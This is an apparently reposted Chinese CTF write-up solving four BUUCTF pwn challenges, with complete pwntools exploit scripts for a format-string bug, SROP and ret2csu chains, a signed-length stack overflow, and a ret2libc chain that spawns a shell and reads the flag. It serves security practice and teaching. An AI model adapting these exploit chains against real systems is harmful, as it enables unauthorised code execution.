PWN-PRACTICE-BUUCTF-7
生活随笔
收集整理的這篇文章主要介紹了
PWN-PRACTICE-BUUCTF-7
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
PWN-PRACTICE-BUUCTF-7
- jarvisoj_fm
- ciscn_2019_s_3
- SROP解法
- ret2csu解法
- bjdctf_2020_babystack2
- [HarekazeCTF2019]baby_rop2
jarvisoj_fm
格式化字符串漏洞,可以測出我們的輸入在棧上的偏移為11
自己構造或者使用fmtstr_payload構造payload均可,目標是讓x==4
ciscn_2019_s_3
先看保護,開了Partial RELRO和NX
main函數里只有一個vuln函數,F5后看到有sys_read和sys_write
利用系統調用,sys_read向棧上寫入最多0x400字節數據,sys_write從棧上取出最多0x30字節數據
0x400和0x30均大于buf的0x10字節,于是可造成棧溢出和泄露棧
注意這里0x00000000004004EE后沒有抬高棧,rbp和rsp始終是相同的,下面也是用rsp來尋址
于是棧溢出時,將buf的0x10字節覆蓋完全后,直接跟想要ret過去的地址即可
再看gadgets處,將rax賦為15,然后返回,下面還有一條gadget將rax賦為59,然后返回
聯系之前的syscall,系統調用號15對應sigreturn,系統調用號59對應execve
于是該題有兩種解法,一是SROP,二是ret2csu,目標都是讓程序執行execve("/bin/sh",0,0),而前提是必須通過sys_write泄露棧地址,進而計算出字符串"/bin/sh"的地址
SROP解法
from pwn import * #context.log_level="debug" context.os="linux" context.arch="amd64" #io=process('./ciscn_s_3') io=remote('node4.buuoj.cn',28749) elf=ELF('./ciscn_s_3') read_write=0x00000000004004F1 gadgets=0x00000000004004DA syscall=0x0000000000400517 payload="/bin/sh\x00"+"a"*8+p64(read_write) io.sendline(payload) io.recv(0x20) binsh=u64(io.recv(8))-0x118 print(hex(binsh)) frame = SigreturnFrame() frame.rax = constants.SYS_execve frame.rdi = binsh frame.rsi = 0 frame.rdx = 0 frame.rip = syscall payload="/bin/sh\x00"+"a"*8+p64(gadgets)+p64(syscall)+str(frame) io.sendline(payload) io.interactive()ret2csu解法
#coding:utf-8 from pwn import * #context.log_level="debug" context.os="linux" context.arch="amd64" #io=process('./ciscn_s_3') io=remote('node4.buuoj.cn',28749) elf=ELF('./ciscn_s_3') read_write=0x00000000004004F1 rax_59=0x00000000004004E2 syscall=0x0000000000400517 pop_rdi_ret=0x00000000004005a3 payload="/bin/sh\x00"+p64(rax_59)+p64(read_write) io.sendline(payload) io.recv(0x20) binsh=u64(io.recv(8))-0x118 print(hex(binsh)) rax_59_stack=binsh+0x10 print(hex(rax_59_stack)) #gadget_2 gadget_2=0x0000000000400580 #gadget_1 gadget_1=0x000000000040059Adef com_gadget(rbx,rbp,r12,r13,r14,r15,main_addr):payload="/bin/sh\x00"+p64(rax_59)payload+=p64(gadget_1) payload+=p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15)payload+=p64(gadget_2) payload+="a"*56 payload+=p64(main_addr) return payload payload=com_gadget(0,1,rax_59_stack,0,0,59,pop_rdi_ret) payload+=p64(binsh)+p64(syscall) io.sendline(payload) io.interactive()bjdctf_2020_babystack2
輸入長度時用"-1"繞過,后面就是簡單的棧溢出,覆蓋rip到backdoor
from pwn import * #io=process('./bjdctf_2020_babystack2') io=remote('node4.buuoj.cn',25885) elf=ELF('./bjdctf_2020_babystack2') backdoor=elf.sym['backdoor'] io.recvuntil('name:\n') io.sendline('-1') io.recvuntil('name?\n') payload='a'*(0x10+8)+p64(backdoor) io.sendline(payload) io.interactive()[HarekazeCTF2019]baby_rop2
棧溢出,ret2libc
from pwn import * context.log_level="debug" io=remote('node4.buuoj.cn',28557) #io=process('./babyrop2') elf=ELF('./babyrop2') libc=ELF('./libc.so.6') printf_plt=elf.plt['printf'] read_got=elf.got['read'] main=0x0000000000400636 pop_rdi_ret=0x0000000000400733 pop_rsi_r15_ret=0x0000000000400731 ret=0x00000000004004d1 s=0x0000000000400770 io.recvuntil("name? ") payload="a"*(0x20+8)+p64(pop_rdi_ret)+p64(s)+p64(pop_rsi_r15_ret)+p64(read_got)+p64(0)+p64(printf_plt)+p64(main) io.sendline(payload) io.recvline() io.recvuntil("again, ") read_addr=u64(io.recvuntil('\x7f')[-6:].ljust(8, '\x00')) print(hex(read_addr)) libc_base=read_addr-libc.sym['read'] system=libc_base+libc.sym['system'] binsh=libc_base+libc.search("/bin/sh").next() payload="a"*(0x20+8)+p64(pop_rdi_ret)+p64(binsh)+p64(ret)+p64(system)+p64(main) io.recvuntil("name? ") io.sendline(payload) io.sendline("cat /home/babyrop2/flag") io.interactive()總結
以上是生活随笔為你收集整理的PWN-PRACTICE-BUUCTF-7的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: iPhone 14 Pro古铜配色曝光霸
- 下一篇: Mysql count() 语句